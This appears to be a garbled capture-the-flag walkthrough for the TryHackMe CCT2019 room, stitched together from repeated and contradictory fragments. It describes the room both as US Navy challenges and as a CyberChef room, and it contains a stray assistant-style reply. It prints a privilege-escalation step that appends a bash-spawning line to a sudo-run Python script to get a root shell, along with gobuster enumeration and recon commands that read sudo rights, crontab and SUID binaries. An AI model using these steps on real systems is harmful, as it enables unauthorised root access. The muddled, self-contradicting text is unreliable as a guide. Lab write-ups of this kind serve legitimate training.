Visit port 80 – you might see a default Apache page or a login portal.
Check port 8080 – often a vulnerable web app.
The /opt/backup.py script contains a system backup routine. However, because we have write access to the directory, we can modify the script. When chester executes it via sudo, our malicious code runs as root.
Exploitation:
echo 'import os; os.system("/bin/bash")' >> /opt/backup.py
sudo /usr/bin/python3 /opt/backup.py
This spawns a root shell.
Note: In the specific CCT2019 challenge, there is often a specific hint regarding "Cigarette" or "Smoke" malware.
Investigation Steps:
a collection of legacy challenges from the US Navy Cyber Competition Team 2019 Assessment . It is rated as cct2019 tryhackme
difficulty and covers various categories including Web, Reversing, Pwn, and Forensics.
Below is a breakdown of the primary challenges and methodologies for the room. Challenge: re3 (Reverse Engineering)
This challenge involves a .NET PE executable that requires a 32-character hex blob as the answer. Initial Analysis : Running the command identifies it as a 32-bit .NET assembly to decompile and analyze the source code. Methodology Focus on the module named , which contains the core logic.
Analyze the GUI components; the application features four sliders with values ranging from 0 to 1024.
Locate the verification function that checks if the slider positions match a specific hardcoded or calculated condition to generate the final hex string. General Room Strategy
Given the "insane" rating, many challenges in this room follow a theme of analytical depth over speed Web Exploitation : Common vulnerabilities in these challenges include SQL Injection CVE-2019-9053 ) or exploiting misconfigured services. Privilege Escalation Visit port 80 – you might see a
: Look for binary exploitation opportunities or common misconfigurations like LD_PRELOAD abuse or vulnerable Persistence
: Note that these are legacy challenges from the US Tenth Fleet; solutions often require understanding older software versions and specific environment quirks from that 2019 timeframe.
I believe you’re referring to the CCT2019 room on TryHackMe and asking about a “useful feature” — likely a tool, technique, or functionality that helps solve the room.
The CCT2019 room (CyberChef: The Cyber Swiss Army Knife) focuses on using CyberChef to decode, decrypt, and manipulate data.
Visit http://<MACHINE_IP> in your browser. You will see a standard Apache default page or a generic site.
The key here is to discover hidden directories or files. This spawns a root shell
Tool: gobuster or dirsearch
Command (Gobuster):
gobuster dir -u http://<MACHINE_IP> -w /usr/share/wordlists/dirb/common.txt
Findings:
You should find a directory called /notes/ (or sometimes just a specific file like note.txt).
Investigation:
Navigate to http://<MACHINE_IP>/notes/. You will likely find a text file (e.g., note.txt) containing a message.
Content of the note: The note usually appears to be from a system administrator mentioning a secret directory or a hidden file.
Example: "I moved the secret development stuff to /secret/"
The presence of two web servers indicates multiple attack surfaces. Port 80 looks like a static corporate site, while port 8080 might host a development or internal tool with weak security.
Pro Tip: Always check robots.txt, /backup, and /admin directories on both ports. Use gobuster or dirb for deeper enumeration.
whoami
id
uname -a
sudo -l
cat /etc/crontab
find / -perm -4000 2>/dev/null # SUID binaries
